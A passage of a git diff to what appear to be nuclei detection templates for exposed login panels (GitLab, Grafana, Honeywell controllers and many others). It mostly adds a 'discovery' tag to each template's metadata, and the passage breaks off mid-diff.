77753bc18a5..7040ca18f70 100644 --- a/http/exposed-panels/gespage-panel.yaml +++ b/http/exposed-panels/gespage-panel.yaml @@ -14,7 +14,7 @@ info: shodan-query: Path=/gespage product: gespage vendor: gespage - tags: panel,gespage + tags: panel,gespage,discovery http: - method: GET diff --git a/http/exposed-panels/ghe-encrypt-saml.yaml b/http/exposed-panels/ghe-encrypt-saml.yaml index 9d64c0fd966..da45bac375a 100644 --- a/http/exposed-panels/ghe-encrypt-saml.yaml +++ b/http/exposed-panels/ghe-encrypt-saml.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: title:"GitHub Enterprise" - tags: github,ghe,saml + tags: github,ghe,saml,discovery http: - method: GET diff --git a/http/exposed-panels/ghost-panel.yaml b/http/exposed-panels/ghost-panel.yaml index 0740341f584..df57c2a9cac 100644 --- a/http/exposed-panels/ghost-panel.yaml +++ b/http/exposed-panels/ghost-panel.yaml @@ -16,7 +16,7 @@ info: vendor: ghost product: ghost fofa-query: app="Ghost" - tags: panel,ghost,login,detect + tags: panel,ghost,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/gira-homeserver-homepage.yaml b/http/exposed-panels/gira-homeserver-homepage.yaml index 8322727e9ef..821197995a9 100644 --- a/http/exposed-panels/gira-homeserver-homepage.yaml +++ b/http/exposed-panels/gira-homeserver-homepage.yaml @@ -15,7 +15,7 @@ info: shodan-query: title:"Gira HomeServer 4" product: gira_home_server_firmware vendor: gira - tags: panel,gira + tags: panel,gira,discovery http: - method: GET diff --git a/http/exposed-panels/gitblit-panel.yaml b/http/exposed-panels/gitblit-panel.yaml index 97b4e080d69..8654b237787 100644 --- a/http/exposed-panels/gitblit-panel.yaml +++ b/http/exposed-panels/gitblit-panel.yaml @@ -22,7 +22,7 @@ info: - body="gitblit" - title="gitblit" google-query: intitle:"gitblit" - tags: panel,gitblit + tags: panel,gitblit,discovery http: - method: GET diff --git a/http/exposed-panels/gitea-login.yaml b/http/exposed-panels/gitea-login.yaml index 1a63bac497a..24029c4e84b 100644 --- a/http/exposed-panels/gitea-login.yaml +++ b/http/exposed-panels/gitea-login.yaml @@ -22,7 +22,7 @@ info: - title="gitea" - body="powered by gitea version" google-query: intitle:"gitea" - tags: gitea,panel + tags: gitea,panel,discovery http: - method: GET diff --git a/http/exposed-panels/github-enterprise-detect.yaml b/http/exposed-panels/github-enterprise-detect.yaml index 3b6575f7fee..21616ef222d 100644 --- a/http/exposed-panels/github-enterprise-detect.yaml +++ b/http/exposed-panels/github-enterprise-detect.yaml @@ -17,7 +17,7 @@ info: shodan-query: - title:"Setup GitHub Enterprise" - micro focus dsd - tags: panel,github + tags: panel,github,discovery http: - method: GET diff --git a/http/exposed-panels/gitlab-detect.yaml b/http/exposed-panels/gitlab-detect.yaml index a56de417f53..fd2550fa553 100644 --- a/http/exposed-panels/gitlab-detect.yaml +++ b/http/exposed-panels/gitlab-detect.yaml @@ -19,7 +19,7 @@ info: - http.title:"gitlab" fofa-query: title="gitlab" google-query: intitle:"gitlab" - tags: panel,gitlab + tags: panel,gitlab,discovery http: - method: GET diff --git a/http/exposed-panels/gitlab-explore.yaml b/http/exposed-panels/gitlab-explore.yaml index df1610b6079..c706f209f9e 100644 --- a/http/exposed-panels/gitlab-explore.yaml +++ b/http/exposed-panels/gitlab-explore.yaml @@ -11,7 +11,7 @@ info: max-request: 2 shodan-query: title:"GitLab" fofa-query: title="GitLab" - tags: gitlab,explore,panel,detect + tags: gitlab,explore,panel,detect,discovery http: - method: GET diff --git a/http/exposed-panels/gitlab-saml.yaml b/http/exposed-panels/gitlab-saml.yaml index e708147b8a7..5386d5002c8 100644 --- a/http/exposed-panels/gitlab-saml.yaml +++ b/http/exposed-panels/gitlab-saml.yaml @@ -19,7 +19,7 @@ info: - body="gitlab enterprise edition" - title="gitlab" google-query: intitle:"gitlab" - tags: panel,saml,gitlab + tags: panel,saml,gitlab,discovery http: - raw: diff --git a/http/exposed-panels/gladinet-centrestack-panel.yaml b/http/exposed-panels/gladinet-centrestack-panel.yaml index b87ad36ce5a..ea4cf5bd928 100644 --- a/http/exposed-panels/gladinet-centrestack-panel.yaml +++ b/http/exposed-panels/gladinet-centrestack-panel.yaml @@ -1,33 +1,33 @@ -id: gladinet-centrestack-panel - -info: - name: CentreStack Login Panel - Detect - author: rxerium - severity: info - description: | - Gladinet CentreStack login panel was detected. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cwe-id: CWE-200 - metadata: - verified: true - max-request: 1 - shodan-query: title:"CentreStack" - tags: panel,centrestack,login,gladinet - -http: - - method: GET - path: - - "{{BaseURL}}/portal/loginpage.aspx" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'CentreStack - Login' - - - type: status - status: +id: gladinet-centrestack-panel + +info: + name: CentreStack Login Panel - Detect + author: rxerium + severity: info + description: | + Gladinet CentreStack login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cwe-id: CWE-200 + metadata: + verified: true + max-request: 1 + shodan-query: title:"CentreStack" + tags: panel,centrestack,login,gladinet,discovery + +http: + - method: GET + path: + - "{{BaseURL}}/portal/loginpage.aspx" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'CentreStack - Login' + + - type: status + status: - 200 # digest: 4a0a004730450221009ac6abd5aafbd0a8292ff6fac489987d9a07199ae7725ab7fdbc91308237be6502204e739501db3fe4a7b8ac6ae6c5965daae80930dcc520a8f0001878b4fecd96c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/globalprotect-panel.yaml b/http/exposed-panels/globalprotect-panel.yaml index 9ec6e21a51b..7cd3117fd2c 100644 --- a/http/exposed-panels/globalprotect-panel.yaml +++ b/http/exposed-panels/globalprotect-panel.yaml @@ -13,7 +13,7 @@ info: max-request: 2 vendor: paloaltonetworks product: globalprotect - tags: panel,panos,globalprotect,paloaltonetworks + tags: panel,panos,globalprotect,paloaltonetworks,discovery http: - method: GET diff --git a/http/exposed-panels/glowroot-panel.yaml b/http/exposed-panels/glowroot-panel.yaml index 6424f88cf71..28dd7025213 100644 --- a/http/exposed-panels/glowroot-panel.yaml +++ b/http/exposed-panels/glowroot-panel.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: title:"Glowroot" - tags: panel,login,glowroot + tags: panel,login,glowroot,discovery http: - method: GET diff --git a/http/exposed-panels/glpi-panel.yaml b/http/exposed-panels/glpi-panel.yaml index 5ec19e1ffb4..020edad2696 100644 --- a/http/exposed-panels/glpi-panel.yaml +++ b/http/exposed-panels/glpi-panel.yaml @@ -25,7 +25,7 @@ info: - title="glpi" - icon_hash="-1474875778" google-query: intitle:"glpi" - tags: glpi,edb,panel,glpi-project + tags: glpi,edb,panel,glpi-project,discovery http: - method: GET diff --git a/http/exposed-panels/gnu-mailman.yaml b/http/exposed-panels/gnu-mailman.yaml index 5d849a9ae0e..49856550f7a 100644 --- a/http/exposed-panels/gnu-mailman.yaml +++ b/http/exposed-panels/gnu-mailman.yaml @@ -21,7 +21,7 @@ info: - cpe:"cpe:2.3:a:gnu:mailman" fofa-query: title="mailing lists" google-query: intitle:"mailing lists" - tags: exposure,mailman,panel,gnu + tags: exposure,mailman,panel,gnu,discovery http: - method: GET diff --git a/http/exposed-panels/go-anywhere-client.yaml b/http/exposed-panels/go-anywhere-client.yaml index 5f2383325b7..9f67face734 100644 --- a/http/exposed-panels/go-anywhere-client.yaml +++ b/http/exposed-panels/go-anywhere-client.yaml @@ -10,7 +10,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,goanywhere,login + tags: panel,goanywhere,login,discovery http: - method: GET diff --git a/http/exposed-panels/goanywhere-mft-login.yaml b/http/exposed-panels/goanywhere-mft-login.yaml index ef4bf1211b2..309aa0490f6 100644 --- a/http/exposed-panels/goanywhere-mft-login.yaml +++ b/http/exposed-panels/goanywhere-mft-login.yaml @@ -15,7 +15,7 @@ info: shodan-query: http.html:"GoAnywhere Managed File Transfer" product: goanywhere_managed_file_transfer vendor: fortra - tags: panel,goanywhere,login,filetransfer + tags: panel,goanywhere,login,filetransfer,discovery http: - method: GET diff --git a/http/exposed-panels/gocd-login.yaml b/http/exposed-panels/gocd-login.yaml index 8576b9f0163..31ca46fd67c 100644 --- a/http/exposed-panels/gocd-login.yaml +++ b/http/exposed-panels/gocd-login.yaml @@ -21,7 +21,7 @@ info: - title="create a pipeline - go" html:"gocd version" - body="gocd version" google-query: intitle:"create a pipeline - go" html:"gocd version" - tags: go,panel,gocd,thoughtworks + tags: go,panel,gocd,thoughtworks,discovery http: - method: GET diff --git a/http/exposed-panels/gocontrol-admin-panel.yaml b/http/exposed-panels/gocontrol-admin-panel.yaml index f43c81fbe03..0ab990b6e9d 100644 --- a/http/exposed-panels/gocontrol-admin-panel.yaml +++ b/http/exposed-panels/gocontrol-admin-panel.yaml @@ -18,7 +18,7 @@ info: product: gocontrol fofa-query: title="Go.Control" zoomeye-query: title="Go.Control" - tags: panel,gocontrol,login,detect + tags: panel,gocontrol,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/gocron-panel.yaml b/http/exposed-panels/gocron-panel.yaml index 1e645eb8f27..719d7aae1b1 100644 --- a/http/exposed-panels/gocron-panel.yaml +++ b/http/exposed-panels/gocron-panel.yaml @@ -14,7 +14,7 @@ info: fofa-query: app="gocron-定时任务系统" product: gocron vendor: gocron_project - tags: gocron,panel + tags: gocron,panel,discovery http: - method: GET diff --git a/http/exposed-panels/gogs-panel.yaml b/http/exposed-panels/gogs-panel.yaml index b84594655b3..6502e17d64d 100644 --- a/http/exposed-panels/gogs-panel.yaml +++ b/http/exposed-panels/gogs-panel.yaml @@ -33,7 +33,7 @@ info: - icon_hash="-449283196" - icon_hash="917966895" - icon_hash="1935513730" - tags: panel,gogs + tags: panel,gogs,discovery http: - method: GET diff --git a/http/exposed-panels/goodjob-dashboard.yaml b/http/exposed-panels/goodjob-dashboard.yaml index 18d977f8481..11a35709ceb 100644 --- a/http/exposed-panels/goodjob-dashboard.yaml +++ b/http/exposed-panels/goodjob-dashboard.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 2 - tags: unauth,panel,goodjob + tags: unauth,panel,goodjob,discovery http: - method: GET diff --git a/http/exposed-panels/google-adk-api-exposed.yaml b/http/exposed-panels/google-adk-api-exposed.yaml index 4fa26b513f5..443ede11cbd 100644 --- a/http/exposed-panels/google-adk-api-exposed.yaml +++ b/http/exposed-panels/google-adk-api-exposed.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 verified: true - tags: adk,exposure,google,ai,agent,api,devops + tags: adk,exposure,google,ai,agent,api,devops,discovery http: - raw: diff --git a/http/exposed-panels/google-adk-webui-exposed.yaml b/http/exposed-panels/google-adk-webui-exposed.yaml index c6ba86818b1..c7d182ea98d 100644 --- a/http/exposed-panels/google-adk-webui-exposed.yaml +++ b/http/exposed-panels/google-adk-webui-exposed.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: http.html:"Agent Development Kit Dev UI" - tags: adk,exposure,google,ai,agent,devops + tags: adk,exposure,google,ai,agent,devops,discovery http: - method: GET diff --git a/http/exposed-panels/gophish-login.yaml b/http/exposed-panels/gophish-login.yaml index c762320ae06..79164649951 100644 --- a/http/exposed-panels/gophish-login.yaml +++ b/http/exposed-panels/gophish-login.yaml @@ -14,7 +14,7 @@ info: shodan-query: http.title:"Gophish - Login" product: gophish vendor: getgophish - tags: panel,gophish + tags: panel,gophish,discovery http: - method: GET diff --git a/http/exposed-panels/gotify-panel.yaml b/http/exposed-panels/gotify-panel.yaml index d79653d4d87..39db8c78061 100644 --- a/http/exposed-panels/gotify-panel.yaml +++ b/http/exposed-panels/gotify-panel.yaml @@ -19,7 +19,7 @@ info: - http.title:"gotify" fofa-query: title="gotify" google-query: intitle:"gotify" - tags: panel,gotify,login,detect + tags: panel,gotify,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/gradle/gradle-cache-node-detect.yaml b/http/exposed-panels/gradle/gradle-cache-node-detect.yaml index 3e5f784b1fe..1c6174646f2 100644 --- a/http/exposed-panels/gradle/gradle-cache-node-detect.yaml +++ b/http/exposed-panels/gradle/gradle-cache-node-detect.yaml @@ -14,7 +14,7 @@ info: max-request: 1 verified: true shodan-query: http.html:"Gradle Enterprise Build Cache Node" - tags: panel,gradle,detect + tags: panel,gradle,detect,discovery http: - method: GET diff --git a/http/exposed-panels/gradle/gradle-develocity-panel.yaml b/http/exposed-panels/gradle/gradle-develocity-panel.yaml index eb0f6bfb61b..e83ad6c0aa2 100644 --- a/http/exposed-panels/gradle/gradle-develocity-panel.yaml +++ b/http/exposed-panels/gradle/gradle-develocity-panel.yaml @@ -15,7 +15,7 @@ info: vendor: gradle product: build_cache_node shodan-query: http.html:"Develocity Build Cache Node" - tags: panel,gradle,detect,login + tags: panel,gradle,detect,login,discovery http: - method: GET diff --git a/http/exposed-panels/gradle/gradle-enterprise-panel.yaml b/http/exposed-panels/gradle/gradle-enterprise-panel.yaml index 128eb898764..644477479c3 100644 --- a/http/exposed-panels/gradle/gradle-enterprise-panel.yaml +++ b/http/exposed-panels/gradle/gradle-enterprise-panel.yaml @@ -13,7 +13,7 @@ info: max-request: 1 vendor: gradle product: gradle_enterprise - tags: panel,gradle + tags: panel,gradle,discovery http: - method: GET diff --git a/http/exposed-panels/grafana-detect.yaml b/http/exposed-panels/grafana-detect.yaml index 14e8a65db53..d2adcd5ebb4 100644 --- a/http/exposed-panels/grafana-detect.yaml +++ b/http/exposed-panels/grafana-detect.yaml @@ -22,7 +22,7 @@ info: - title="grafana" - app="grafana" google-query: intitle:"grafana" - tags: panel,grafana,detect + tags: panel,grafana,detect,discovery http: - method: GET diff --git a/http/exposed-panels/grails-database-admin-console.yaml b/http/exposed-panels/grails-database-admin-console.yaml index 9f99c557944..5144b5eade6 100644 --- a/http/exposed-panels/grails-database-admin-console.yaml +++ b/http/exposed-panels/grails-database-admin-console.yaml @@ -17,7 +17,7 @@ info: max-request: 2 vendor: grails product: grails - tags: grails,panel + tags: grails,panel,discovery http: - method: GET diff --git a/http/exposed-panels/graphite-browser.yaml b/http/exposed-panels/graphite-browser.yaml index 7baeecd625a..92c6f417379 100644 --- a/http/exposed-panels/graphite-browser.yaml +++ b/http/exposed-panels/graphite-browser.yaml @@ -16,7 +16,7 @@ info: shodan-query: http.title:"Graphite Browser" product: graphite vendor: graphite_project - tags: graphite,panel + tags: graphite,panel,discovery http: - method: GET diff --git a/http/exposed-panels/graylog-panel.yaml b/http/exposed-panels/graylog-panel.yaml index 8297baab9c2..0442c988b2f 100644 --- a/http/exposed-panels/graylog-panel.yaml +++ b/http/exposed-panels/graylog-panel.yaml @@ -16,7 +16,7 @@ info: vendor: graylog product: graylog shodan-query: http.title:"Graylog Web Interface" - tags: panel,graylog,login,detect + tags: panel,graylog,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/greenbone-panel.yaml b/http/exposed-panels/greenbone-panel.yaml index 33031c8987a..9ae199340b3 100644 --- a/http/exposed-panels/greenbone-panel.yaml +++ b/http/exposed-panels/greenbone-panel.yaml @@ -19,7 +19,7 @@ info: zoomeye-query: title="Greenbone Security Assistant" fofa-query: title="greenbone security assistant" google-query: intitle:"greenbone security assistant" - tags: panel,greenbone,login + tags: panel,greenbone,login,discovery http: - method: GET diff --git a/http/exposed-panels/group-ib-panel.yaml b/http/exposed-panels/group-ib-panel.yaml index 0515d3c5557..fb2caa87d46 100644 --- a/http/exposed-panels/group-ib-panel.yaml +++ b/http/exposed-panels/group-ib-panel.yaml @@ -14,7 +14,7 @@ info: verified: true max-request: 1 shodan-query: title:"Group-IB Managed XDR" - tags: panel,groupib + tags: panel,groupib,discovery http: - method: GET diff --git a/http/exposed-panels/gryphon-login.yaml b/http/exposed-panels/gryphon-login.yaml index c044b3d2cb4..4702473739d 100644 --- a/http/exposed-panels/gryphon-login.yaml +++ b/http/exposed-panels/gryphon-login.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Gryphon" - tags: panel,gryphon,router + tags: panel,gryphon,router,discovery http: - method: GET diff --git a/http/exposed-panels/gyra-master-admin.yaml b/http/exposed-panels/gyra-master-admin.yaml index 7e79f0fef87..570f0ac54be 100644 --- a/http/exposed-panels/gyra-master-admin.yaml +++ b/http/exposed-panels/gyra-master-admin.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: title:"Login | GYRA Master Admin" - tags: panel,master,admin,gyra + tags: panel,master,admin,gyra,discovery http: - method: GET diff --git a/http/exposed-panels/h2console-panel.yaml b/http/exposed-panels/h2console-panel.yaml index f86a03b1da3..28dfab6faa4 100644 --- a/http/exposed-panels/h2console-panel.yaml +++ b/http/exposed-panels/h2console-panel.yaml @@ -22,7 +22,7 @@ info: - cpe:"cpe:2.3:a:h2database:h2" fofa-query: title="h2 console" google-query: intitle:"h2 console" - tags: panel,h2,console,h2database + tags: panel,h2,console,h2database,discovery http: - method: GET diff --git a/http/exposed-panels/hadoop-exposure.yaml b/http/exposed-panels/hadoop-exposure.yaml index 906b1785e42..63e41b0cc9b 100644 --- a/http/exposed-panels/hadoop-exposure.yaml +++ b/http/exposed-panels/hadoop-exposure.yaml @@ -13,7 +13,7 @@ info: max-request: 1 vendor: apache product: hadoop - tags: panel,apache,hadoop + tags: panel,apache,hadoop,discovery http: - method: GET diff --git a/http/exposed-panels/haivision-gateway-panel.yaml b/http/exposed-panels/haivision-gateway-panel.yaml index 9438db09a3e..af29bad5086 100644 --- a/http/exposed-panels/haivision-gateway-panel.yaml +++ b/http/exposed-panels/haivision-gateway-panel.yaml @@ -11,7 +11,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"Haivision Gateway" - tags: panel,haivision,login,detect + tags: panel,haivision,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/haivision-media-platform-panel.yaml b/http/exposed-panels/haivision-media-platform-panel.yaml index c44bb6f4289..3d9d318b157 100644 --- a/http/exposed-panels/haivision-media-platform-panel.yaml +++ b/http/exposed-panels/haivision-media-platform-panel.yaml @@ -1,5 +1,5 @@ -id: haivision-media-platform-panel - +id: haivision-media-platform-panel + info: name: Haivision Media Platform Login Panel - Detect author: righettod @@ -11,17 +11,17 @@ info: verified: true max-request: 1 shodan-query: http.title:"Haivision Media Platform" - tags: panel,haivision,login,detect + tags: panel,haivision,login,detect,discovery -http: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: dsl - dsl: - - 'status_code == 200' - - 'contains_any(body, "<title>Haivision Media Platform", "content=\"Haivision Network Video")' +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_any(body, "<title>Haivision Media Platform", "content=\"Haivision Network Video")' condition: and # digest: 4a0a0047304502210085de7f4d780a35215f132c6c64f20e43b537c930f22218c3236c5350e6f27d3c022011f18d62b25287b5773383c7726449df2fbeb6d50b5785bc90f046620fbe1cac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/hal-management-panel.yaml b/http/exposed-panels/hal-management-panel.yaml index 59e9b6d4b15..c0c8ffac027 100644 --- a/http/exposed-panels/hal-management-panel.yaml +++ b/http/exposed-panels/hal-management-panel.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: html:"HAL Management Console" - tags: panel,login,hal + tags: panel,login,hal,discovery http: - method: GET diff --git a/http/exposed-panels/hangfire-dashboard.yaml b/http/exposed-panels/hangfire-dashboard.yaml index 704cc42b610..2970b2b4180 100644 --- a/http/exposed-panels/hangfire-dashboard.yaml +++ b/http/exposed-panels/hangfire-dashboard.yaml @@ -19,7 +19,7 @@ info: - http.title:"overview – hangfire dashboard" fofa-query: title="overview – hangfire dashboard" google-query: intitle:"overview – hangfire dashboard" - tags: panel,hangfire + tags: panel,hangfire,discovery http: - method: GET diff --git a/http/exposed-panels/harbor-panel.yaml b/http/exposed-panels/harbor-panel.yaml index ff3e3df4530..0a94433441e 100644 --- a/http/exposed-panels/harbor-panel.yaml +++ b/http/exposed-panels/harbor-panel.yaml @@ -18,7 +18,7 @@ info: product: harbor shodan-query: http.favicon.hash:657337228 fofa-query: icon_hash=657337228 - tags: panel,harbor,linuxfoundation,detect,login + tags: panel,harbor,linuxfoundation,detect,login,discovery http: - method: GET diff --git a/http/exposed-panels/hashicorp-consul-agent.yaml b/http/exposed-panels/hashicorp-consul-agent.yaml index 108923098fa..ecdb0ec48d5 100644 --- a/http/exposed-panels/hashicorp-consul-agent.yaml +++ b/http/exposed-panels/hashicorp-consul-agent.yaml @@ -18,7 +18,7 @@ info: - cpe:"cpe:2.3:a:hashicorp:consul" fofa-query: title="consul by hashicorp" google-query: intitle:"consul by hashicorp" - tags: tech,consul,api,panel,hashicorp + tags: tech,consul,api,panel,hashicorp,discovery http: - method: GET diff --git a/http/exposed-panels/hashicorp-consul-webgui.yaml b/http/exposed-panels/hashicorp-consul-webgui.yaml index 3ff06616d41..00460fe020d 100644 --- a/http/exposed-panels/hashicorp-consul-webgui.yaml +++ b/http/exposed-panels/hashicorp-consul-webgui.yaml @@ -19,7 +19,7 @@ info: - cpe:"cpe:2.3:a:hashicorp:consul" fofa-query: title="consul by hashicorp" google-query: intitle:"consul by hashicorp" - tags: consul,webserver,panel,hashicorp + tags: consul,webserver,panel,hashicorp,discovery http: - method: GET diff --git a/http/exposed-panels/hestia-panel.yaml b/http/exposed-panels/hestia-panel.yaml index d2fafddfdff..491197fde57 100644 --- a/http/exposed-panels/hestia-panel.yaml +++ b/http/exposed-panels/hestia-panel.yaml @@ -24,7 +24,7 @@ info: - icon_hash=-476299640 - title="hestia control panel" google-query: intitle:"hestia control panel" - tags: panel,hestia,detect,hestiacp + tags: panel,hestia,detect,hestiacp,discovery http: - method: GET diff --git a/http/exposed-panels/highmail-admin-panel.yaml b/http/exposed-panels/highmail-admin-panel.yaml index d79b2f76eec..f1453d0f24f 100644 --- a/http/exposed-panels/highmail-admin-panel.yaml +++ b/http/exposed-panels/highmail-admin-panel.yaml @@ -20,7 +20,7 @@ info: - title="HighMail" - title="highmail" google-query: intitle:"highmail" - tags: highmail,panel,aryanic + tags: highmail,panel,aryanic,discovery http: - method: GET diff --git a/http/exposed-panels/hitron-technologies.yaml b/http/exposed-panels/hitron-technologies.yaml index 4af1086165b..612a9b30d65 100644 --- a/http/exposed-panels/hitron-technologies.yaml +++ b/http/exposed-panels/hitron-technologies.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,edb,router + tags: panel,edb,router,discovery http: - method: GET diff --git a/http/exposed-panels/hivemanager-login-panel.yaml b/http/exposed-panels/hivemanager-login-panel.yaml index 250a9f9beca..97ecd9258e2 100644 --- a/http/exposed-panels/hivemanager-login-panel.yaml +++ b/http/exposed-panels/hivemanager-login-panel.yaml @@ -15,7 +15,7 @@ info: shodan-query: http.favicon.hash:1604363273 product: hivemanager_classic vendor: aerohive - tags: panel,hivemanager,aerohive + tags: panel,hivemanager,aerohive,discovery http: - method: GET diff --git a/http/exposed-panels/hmc-hybris-panel.yaml b/http/exposed-panels/hmc-hybris-panel.yaml index 5d0d8852522..09f33530ffc 100644 --- a/http/exposed-panels/hmc-hybris-panel.yaml +++ b/http/exposed-panels/hmc-hybris-panel.yaml @@ -16,7 +16,7 @@ info: shodan-query: http.title:"hybris" fofa-query: title="hybris" google-query: intitle:"hybris" - tags: panel,sap + tags: panel,sap,discovery http: - method: GET diff --git a/http/exposed-panels/home-assistant-panel.yaml b/http/exposed-panels/home-assistant-panel.yaml index 82fe03cae92..1b277268e58 100644 --- a/http/exposed-panels/home-assistant-panel.yaml +++ b/http/exposed-panels/home-assistant-panel.yaml @@ -15,7 +15,7 @@ info: shodan-query: http.title:"Home Assistant" product: home-assistant vendor: home-assistant - tags: panel,iot,homeassistant + tags: panel,iot,homeassistant,discovery http: - method: GET diff --git a/http/exposed-panels/homebridge-panel.yaml b/http/exposed-panels/homebridge-panel.yaml index de62552ad60..2dcde078c54 100644 --- a/http/exposed-panels/homebridge-panel.yaml +++ b/http/exposed-panels/homebridge-panel.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 shodan-query: title:"Homebridge" - tags: panel,homebridge,detect + tags: panel,homebridge,detect,discovery http: - method: GET diff --git a/http/exposed-panels/homematic-panel.yaml b/http/exposed-panels/homematic-panel.yaml index 05005837578..e1577fcbbab 100644 --- a/http/exposed-panels/homematic-panel.yaml +++ b/http/exposed-panels/homematic-panel.yaml @@ -17,7 +17,7 @@ info: - http.html:"Homematic" - http.html:"homematic" fofa-query: body="homematic" - tags: panel,homematic,iot,eq-3 + tags: panel,homematic,iot,eq-3,discovery http: - method: GET diff --git a/http/exposed-panels/homer-panel.yaml b/http/exposed-panels/homer-panel.yaml index 7b831d49735..5a69a761870 100644 --- a/http/exposed-panels/homer-panel.yaml +++ b/http/exposed-panels/homer-panel.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:-417785140 - tags: panel,homer,detect,login + tags: panel,homer,detect,login,discovery http: - method: GET diff --git a/http/exposed-panels/honeywell-web-controller.yaml b/http/exposed-panels/honeywell-web-controller.yaml index d9d8d6d355d..3313c27eb62 100644 --- a/http/exposed-panels/honeywell-web-controller.yaml +++ b/http/exposed-panels/honeywell-web-controller.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: edb,panel + tags: edb,panel,discovery http: - method: GET diff --git a/http/exposed-panels/honeywell-xl-web-controller.yaml b/http/exposed-panels/honeywell-xl-web-controller.yaml index b2763cf6c6c..1fe4a0ce60f 100644 --- a/http/exposed-panels/honeywell-xl-web-controller.yaml +++ b/http/exposed-panels/honeywell-xl-web-controller.yaml @@ -14,7 +14,7 @@ info: verified: true max-request: 1 shodan-query: title:"Honeywell XL Web Controller" - tags: panel,honeywell,edb + tags: panel,honeywell,edb,discovery http: - method: GET diff --git a/http/exposed-panels/hoobs-panel.yaml b/http/exposed-panels/hoobs-panel.yaml index d7d3fff136a..4a29bc0a200 100644 --- a/http/exposed-panels/hoobs-panel.yaml +++ b/http/exposed-panels/hoobs-panel.yaml @@ -11,7 +11,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"HOOBS" - tags: panel,iot,homekit,hoobs + tags: panel,iot,homekit,hoobs,discovery http: - method: GET diff --git a/http/exposed-panels/hoppscotch-panel.yaml b/http/exposed-panels/hoppscotch-panel.yaml index 5304702a540..b9bf392113d 100644 --- a/http/exposed-panels/hoppscotch-panel.yaml +++ b/http/exposed-panels/hoppscotch-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 fofa-query: icon_hash="1531008637" - tags: panel,login,hoppscotch,detect + tags: panel,login,hoppscotch,detect,discovery http: - method: GET diff --git a/http/exposed-panels/horde-login-panel.yaml b/http/exposed-panels/horde-login-panel.yaml index 38b380628b8..f3f6f4c36e4 100644 --- a/http/exposed-panels/horde-login-panel.yaml +++ b/http/exposed-panels/horde-login-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 2 shodan-query: http.favicon.hash:-741491222 - tags: horde,panel + tags: horde,panel,discovery http: - method: GET diff --git a/http/exposed-panels/horde-webmail-login.yaml b/http/exposed-panels/horde-webmail-login.yaml index 320226ab6dc..c8cc531514f 100644 --- a/http/exposed-panels/horde-webmail-login.yaml +++ b/http/exposed-panels/horde-webmail-login.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 2 shodan-query: http.favicon.hash:2104916232 - tags: horde,webmail,panel + tags: horde,webmail,panel,discovery http: - method: GET diff --git a/http/exposed-panels/hospital-management-panel.yaml b/http/exposed-panels/hospital-management-panel.yaml index 83747e24231..b4f617400b3 100644 --- a/http/exposed-panels/hospital-management-panel.yaml +++ b/http/exposed-panels/hospital-management-panel.yaml @@ -18,7 +18,7 @@ info: - http.html:"Hospital Management System" - http.html:"hospital management system" fofa-query: body="hospital management system" - tags: panel,hms,cms,hospital_management_system_project + tags: panel,hms,cms,hospital_management_system_project,discovery http: - method: GET diff --git a/http/exposed-panels/hp-ilo-5.yaml b/http/exposed-panels/hp-ilo-5.yaml index 3a8dfcdeb7c..6f81c5f9169 100644 --- a/http/exposed-panels/hp-ilo-5.yaml +++ b/http/exposed-panels/hp-ilo-5.yaml @@ -15,7 +15,7 @@ info: max-request: 1 vendor: hpe product: integrated_lights-out_5 - tags: hp,ilo,panel,hpe + tags: hp,ilo,panel,hpe,discovery http: - method: GET diff --git a/http/exposed-panels/hp-service-manager.yaml b/http/exposed-panels/hp-service-manager.yaml index e2b11968b3c..04fd532b41f 100644 --- a/http/exposed-panels/hp-service-manager.yaml +++ b/http/exposed-panels/hp-service-manager.yaml @@ -18,7 +18,7 @@ info: - http.title:"hp service manager" fofa-query: title="hp service manager" google-query: intitle:"hp service manager" - tags: panel,hp,service + tags: panel,hp,service,discovery http: - method: GET diff --git a/http/exposed-panels/hp-virtual-connect-manager.yaml b/http/exposed-panels/hp-virtual-connect-manager.yaml index 54d3c2835b5..bdd30f77dba 100644 --- a/http/exposed-panels/hp-virtual-connect-manager.yaml +++ b/http/exposed-panels/hp-virtual-connect-manager.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"HP Virtual Connect Manager" - tags: panel,hp + tags: panel,hp,discovery http: - method: GET diff --git a/http/exposed-panels/hpe-officeconnect-panel.yaml b/http/exposed-panels/hpe-officeconnect-panel.yaml index c915f1acce8..91174b92302 100644 --- 